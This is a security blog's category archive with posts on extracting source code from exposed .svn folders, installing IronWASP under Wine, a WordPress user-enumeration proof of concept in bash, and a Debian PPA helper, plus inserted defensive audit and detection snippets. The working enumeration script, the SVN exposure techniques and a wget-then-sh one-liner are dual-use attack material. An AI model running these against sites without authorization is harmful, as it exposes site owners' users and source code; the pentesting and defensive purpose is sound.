Category Archives: scripting

SVN Extractor for Web Pentesters

Web application pen-testers frequently encounter .svn folders on target sites. For those not aware, the .svn folder is used by the SVN (Subversion) version control system to store its working-copy metadata. For a blackbox pentester this folder contains a huge amount of information, allowing one to:

1) Uncover hidden file and folder names

2) Access the source code of the files.

3) Download files even if restrictions are in place via .htaccess.

How this can be achieved:

1) Uncover hidden file and folder names

There are two ways in which this can be achieved, depending on the version of SVN in use.

For SVN <1.6 there is the .svn/entries file, which contains the list of files and folders as well as the usernames used for committing those files.

For SVN >1.6 there is .svn/wc.db, which contains similar data in SQLite3 format.

Both files may be directly accessible through the URL.

2) Access the source code / download files even if .htaccess blocks access

SVN keeps a backup (pristine) copy of all files, in one of two locations depending on the version:

1) .svn/text-base/"filename".svn-base

2) .svn/pristine/"XX"/"CHECKSUM".svn-base

where

filename is the actual name of the file,

CHECKSUM is the SHA1 sum of the file, and

XX is the first two characters of CHECKSUM.

The first type of entry has one limitation. Suppose the file name is testme.php; the path then becomes

.svn/text-base/testme.php.svn-base

and a large number of servers will execute the file using the PHP engine and serve the output instead of the source.

That's where option 2 shines, since the checksum-based name carries no .php extension to trigger the handler. However this information is available only in the case of wc.db (SVN version >1.6), and it requires that the .svn/pristine directory is web accessible.
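As an added defensive illustration (not part of the original post or of the svn-extractor tool), the following Python reproduces the pristine-path derivation described above and uses it in a pre-deployment audit that walks a document root and lists every .svn artefact a web server would otherwise serve; SAMPLE_PHP and the temp-dir layout built in demo() are constructed.

```python
import hashlib
import os
import tempfile

# Constructed sample file content (not taken from any real site).
SAMPLE_PHP = b"<?php echo 'hello'; ?>\n"

def pristine_path(content):
    """Where SVN >1.6 keeps the pristine copy of a file with this content:
    .svn/pristine/XX/CHECKSUM.svn-base, CHECKSUM = SHA1 hex digest,
    XX = its first two characters."""
    checksum = hashlib.sha1(content).hexdigest()
    return ".svn/pristine/%s/%s.svn-base" % (checksum[:2], checksum)

def audit_webroot(root):
    """Pre-deployment check: for every .svn directory under root, list the
    metadata (entries, wc.db) and source copies (*.svn-base) that would be
    served if the directory is reachable over HTTP."""
    findings = {}
    for dirpath, dirnames, filenames in os.walk(root):
        if ".svn" not in dirnames:
            continue
        dirnames.remove(".svn")  # report the metadata dir, do not descend into it
        svn_dir = os.path.join(dirpath, ".svn")
        exposed = [m for m in ("entries", "wc.db")
                   if os.path.isfile(os.path.join(svn_dir, m))]
        for sub in ("text-base", "pristine"):
            for base, _, files in os.walk(os.path.join(svn_dir, sub)):
                exposed += [os.path.relpath(os.path.join(base, f), svn_dir).replace(os.sep, "/")
                            for f in files if f.endswith(".svn-base")]
        findings[os.path.relpath(dirpath, root).replace(os.sep, "/")] = sorted(exposed)
    return findings

def demo():
    """Build a constructed >1.6-style checkout in a temp dir and audit it."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "index.php"), "wb") as fh:
        fh.write(SAMPLE_PHP)
    pristine = os.path.join(root, *pristine_path(SAMPLE_PHP).split("/"))
    os.makedirs(os.path.dirname(pristine))   # also creates root/.svn
    with open(pristine, "wb") as fh:
        fh.write(SAMPLE_PHP)                  # pristine copy of index.php
    open(os.path.join(root, ".svn", "wc.db"), "wb").close()  # empty stand-in for the SQLite db
    return audit_webroot(root)

if __name__ == "__main__":
    print(demo())
```

The lasting fix is to deploy from `svn export` rather than from a working copy, or to deny requests for any path containing .svn in the web server configuration.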

However, after searching a lot I was not able to find a single piece of code which can do both these things in one go.

So here is a tool which can perform both operations in one script.

Usage

svn-extractor.py --url "url with .svn available"

Source Link : https://github.com/anantshri/svn-extractor

So far this has only been tested on localhost environments; however I hope to get some feedback on it.

References

It would be unfair to say that I did all the research myself, so here are the links to the various resources I used to get this information.

1) http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us (manual technique for wc.db)

2) http://www.adamgotterer.com/post/28125474053/hacking-the-svn-directory-archive (manual technique for .svn/entries)

3) http://www.cirt.net/svnpristine (the only automated tool I could find online, doing half of what this tool does)

IronWasp on Linux

For those looking for how to download and install IronWASP on Linux:

One-line copy-paste command:

wget http://blog.anantshri.info/content/uploads/2013/01/ironwasp_installer.sh.txt -O ~/ironwasp_installer.sh && sh ~/ironwasp_installer.sh

Those looking for some background reading can continue from here.

This post talks about running IronWASP on Linux. First, a little background.

IronWASP (from ironwasp.org):

IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing. It is designed to be customizable to the extent where users can create their own custom security scanners using it. Though an advanced user with Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the tool’s features are simple enough to be used by absolute beginners.

Where does Linux come into the picture?

IronWASP is based on FiddlerCore and uses .NET for its UI. Hence running it on Linux was a bit hard. Mono is out of the question here as FiddlerCore doesn't play well with Mono. Lava and I did work on checking whether Mono could support it, but the efforts didn't work out. Then came the CrossOver Office giveaway sale and a surprise tweet from R3dsm0k3 about being able to run IronWASP successfully through CrossOver Office on Mac.


From that time I was wondering why only CrossOver Office; we should be able to do it directly in Wine. Finally today I got some time to sit down and see how CrossOver does it and what could be done with Wine, and here is the output.

Disclaimer: this is in no way a fully baked script; it's bits and pieces joined overnight to get things working. I can't promise that a new release will be done, but it would surely help anyone who wants to work on it.

Once you run this script, all you need to do is click Next, Next, Finish for the .NET 2.0 installation, and soon you will find an icon on your Linux desktop named IWASP which will launch IronWASP for you. In the background the script will automatically download and install the various dependencies required and configure the system.

Prerequisites: Wine version >= 1.4 and internet connectivity.

I will try to see if I can make a video for the same setup; till then this textual output should be enough.

Note: during setup, if there is a prompt to restart now or later, please select restart now. Your system won't reboot; just Wine restarts.

Download Link : ironwasp_installer.sh

One Liner

wget http://blog.anantshri.info/content/uploads/2013/01/ironwasp_installer.sh.txt -O ~/ironwasp_installer.sh && sh ~/ironwasp_installer.sh

 

Feel free to suggest changes or comment.

KNOWN ISSUES

1) UI-Designer doesn't work for drag-and-drop UI building on 32-bit Linux (working on 64-bit Linux). (Mac working is confirmed by r3dsm0k3.)

CHANGELOG

22-01-2013:
1) r3dsm0k3 confirmed that the script works on Mac too.
2) Code modified to add a reference.
3) Shortcut details updated to correct a few issues when the API tree was not visible on the right side.
4) dos2unix converted: web edits had caused the script to go DOS (CRLF line endings).
5) WINEPREFIX specifically marked as 32-bit.

23-01-2013:

1) Customization to make the script work on 64-bit Linux instances.

NOTE

In case you observe that after running the script there is an error from Wine suggesting to install Mono for Linux / Windows, I would suggest rerunning the script, but this time comment out the wget URL for CNET and uncomment the wget URL for Microsoft downloads. Both URLs are used to download .NET SP2, but sometimes one goes down, and I had a better success ratio with the CNET link. However, YMMV. Feel free to add a comment here in case of any issue, but make sure to include the entire output of the above listed command. This helps in quickly solving the issue.

In case you don't want to add a lot of junk in a comment, I would suggest emailing me with the details at [email protected]

WordPress User Enumeration PoC Shell Script

Hi All,

We have recently seen the WordPress username enumeration vulnerability disclosure here: http://seclists.org/fulldisclosure/2011/May/493

Versions affected are: 2.6, 3.1, 3.1.1, 3.1.3

Here I am enclosing a simple PoC which can be run in the Bash shell.
(Note: a PoC in Python is already available for those who are curious.)

#!/bin/bash
# WordPress User Enumeration PoC by Anant Shrivastava
# Disclosure : http://seclists.org/fulldisclosure/2011/May/493
# License : GPLv2
# License URL : http://www.gnu.org/licenses/gpl-2.0.html
#
# Sends a HEAD request for /?author=N (N = 0..9). An affected site answers
# with a redirect whose Location header ends in /author/<username>/.
if [ $# -ne 1 ]
then
	echo "Wordpress username enumeration PoC"
	echo "based on disclosure @ : http://seclists.org/fulldisclosure/2011/May/493 "
	echo "$0 <URL of Website>"
else
	count=0
	title=0
	while [ "$count" -lt 10 ]
	do
		# -I sends HEAD only; --max-filesize 1 aborts if a body is sent anyway
		result=$(curl -I -s --max-time 30 --max-filesize 1 "$1?author=$count" | grep -F 'Location:')
		if [ -n "$result" ]
		then
			# the last path segment of the Location URL is the username
			name=$(echo "$result" | tr -d '\r' | rev | cut -f2 -d"/" | rev)
			if [ "$title" -eq 0 ]
			then
				echo "ID : UserName"
				title=1
			fi
			echo "$count : $name"
		fi
		count=$((count + 1))
	done
	if [ "$title" -eq 0 ]
	then
		echo "Either this site is not vulnerable or is not running WordPress"
	fi
fi

The code can be downloaded from here: wp_2_PoC_user_name_enum
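From the defender's side, the probing pattern the PoC above produces (one client walking sequential ?author=N values and collecting redirects) is easy to spot in web server logs. The following Python is an added example, not part of the original post; SAMPLE_LOG is constructed Apache combined-format traffic using documentation IP ranges.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2011:12:00:01 +0000] "HEAD /?author=1 HTTP/1.1" 301 - "-" "curl/7.21.0"
203.0.113.7 - - [10/May/2011:12:00:02 +0000] "HEAD /?author=2 HTTP/1.1" 301 - "-" "curl/7.21.0"
203.0.113.7 - - [10/May/2011:12:00:02 +0000] "HEAD /?author=3 HTTP/1.1" 404 - "-" "curl/7.21.0"
203.0.113.7 - - [10/May/2011:12:00:03 +0000] "HEAD /?author=4 HTTP/1.1" 301 - "-" "curl/7.21.0"
198.51.100.4 - - [10/May/2011:12:05:00 +0000] "GET /?author=2 HTTP/1.1" 301 - "-" "Mozilla/5.0"
198.51.100.4 - - [10/May/2011:12:05:09 +0000] "GET /author/alice/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Apache combined log format: client IP, ident, user, [time], "METHOD PATH PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
AUTHOR_RE = re.compile(r'[?&]author=(\d+)')

def find_author_enumeration(log_text, threshold=3):
    """Return, per client IP that probed at least `threshold` distinct
    ?author=N values, the IDs it probed and the IDs that were redirected
    (a 301/302 to /author/<name>/ is what leaks the login name)."""
    probed = defaultdict(set)
    resolved = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        a = AUTHOR_RE.search(m.group("path"))
        if not a:
            continue
        ip, uid = m.group("ip"), int(a.group(1))
        probed[ip].add(uid)
        if m.group("status") in ("301", "302"):
            resolved[ip].add(uid)
    return {ip: {"probed": sorted(ids), "resolved": sorted(resolved[ip])}
            for ip, ids in probed.items() if len(ids) >= threshold}

if __name__ == "__main__":
    for ip, info in find_author_enumeration(SAMPLE_LOG).items():
        print(ip, info)
```

Detection complements the fix: sites that do not need author archives can answer ?author=N requests with a 404 instead of the revealing redirect.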

Howto add PPA in debian

I am back with some more scripting fun.

I have been working on configuring my new Debian machine and found one utility very lacking in Debian: add-apt-repository.
So I sat down, took my time, and finally I was able to mix and match this simple script.

Disclaimer: I know adding PPAs can have adverse effects on Debian machines.

At this point the work that this script performs is:

  1. Add the repository of the PPA (here I am using lucid as the distribution of choice, because I am using Squeeze as my Debian version).
  2. Add the GPG key to the keyring.

Disclaimer

  • This script is at this point tested only on one machine: Debian Squeeze (Mint flavoured).

File : add-apt-repository.sh

Steps to install this:

1. Download the file

$ wget http://blog.anantshri.info/content/uploads/2010/09/add-apt-repository.sh.txt

2. Save this file in /usr/sbin/

$ cp add-apt-repository.sh.txt /usr/sbin/add-apt-repository

3. Change permissions to execute

$ chmod o+x /usr/sbin/add-apt-repository

4. Change ownership to root

$ chown root:root /usr/sbin/add-apt-repository

5. Now whenever you need to execute the command, type

$ sudo add-apt-repository ppa:ppa-name
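Since the ppa:ppa-name argument ends up in a sources.list.d file name and in the commands that fetch the key, a wrapper like this should validate it before doing anything else. The following Python is an added example, not the author's script; the owner/archive character set, the .list file naming and the lucid deb line are assumptions modelled on Launchpad's usual PPA layout.

```python
import re

# Assumed Launchpad PPA spec: "ppa:<owner>/<archive>", each component made of
# lowercase letters, digits, ".", "+" or "-" and starting with a letter or digit.
PPA_RE = re.compile(r'^ppa:([a-z0-9][a-z0-9.+-]*)/([a-z0-9][a-z0-9.+-]*)$')

def is_valid_ppa(spec):
    """True only for a plain owner/archive pair (no spaces, quotes, ';', '..' etc.)."""
    return PPA_RE.match(spec.strip()) is not None

def ppa_sources_entry(spec, dist="lucid"):
    """Validate the spec and return (sources.list.d path, deb line) for `dist`.
    Raises ValueError on anything that fails the whitelist, so the argument can
    never smuggle shell metacharacters or path components into later commands."""
    m = PPA_RE.match(spec.strip())
    if not m:
        raise ValueError("not a valid ppa:owner/archive spec: %r" % spec)
    owner, archive = m.groups()
    # Assumed naming: /etc/apt/sources.list.d/<owner>-<archive>-<dist>.list
    filename = "/etc/apt/sources.list.d/%s-%s-%s.list" % (owner, archive, dist)
    line = "deb http://ppa.launchpad.net/%s/%s/ubuntu %s main" % (owner, archive, dist)
    return filename, line

if __name__ == "__main__":
    print(ppa_sources_entry("ppa:chris-lea/node.js"))
```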

Opening this script to a larger audience so that we can crowdsource efforts if someone likes it.

Hope this can help someone.

File : add-apt-repository.sh

Change Log

7-Jan-2011: Updated the tutorial to place the file at /usr/sbin as suggested by various people in the comments.

6-Aug-2011: Updated the script to deal with a security hole (although not easily exploitable) as suggested by 7eggert in comment no. 23.

10-Sep-2011: bin corrected to sbin in steps 3 and 4. Thanks to Craig for pointing that out.